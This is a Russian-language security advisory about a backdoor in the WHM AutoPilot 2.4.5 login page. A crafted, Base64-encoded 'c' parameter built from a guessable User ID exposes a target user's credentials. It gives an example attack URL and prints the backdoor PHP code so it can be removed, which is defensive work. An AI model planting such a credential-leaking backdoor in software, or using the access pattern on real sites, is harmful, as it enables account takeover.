Security Lab

Бекдор в странице входа в систему в WHM AutoPilot

Дата публикации:02.08.2004
Дата изменения:17.10.2006
Всего просмотров:1090
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: WHM AutoPilot 2.x
Уязвимые версии: WHM AutoPilot 2.4.5

Описание: Уязвимость в WHM AutoPilot позволяет удаленному пользователю получить опознавательные мандаты целевого пользователя.

Страница входа в систему 'clogin.php' содержит бекдор. Удаленный пользователь может представить http get запрос со специально сформированным параметром ‘c’, чтобы получить доступ к учетной записи целевого пользователя. Значение параметра основано на поле User ID целевого пользователя, шифрованного функцией clogin_e() и кодированным Base64. Поле User ID генерируется инкрементально и может быть легко предугадано. Пример:

http://[target domain]/accounts/clogin.php?c=[KEY]

URL производителя: http://www.whmautopilot.com/index.php

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Удалите следующий код из clogin.php:

if (isset($c))
{
$c=clogin_d(base64_decode($c));

$query="select ";
$query.="username, ";
$query.="password ";
$query.="from ";
$query.="user ";
$query.="where ";
$query.="uid='".addslashes(trim($c))."' ";
$query.="limit 0, 1";

$rs=mysql_fetch_row(mysql_query($query));

$username=$rs[0];
$password=clogin_d(base64_decode($rs[1]));
}
Ссылки: Sonicwall diag tool includes VPN credentlials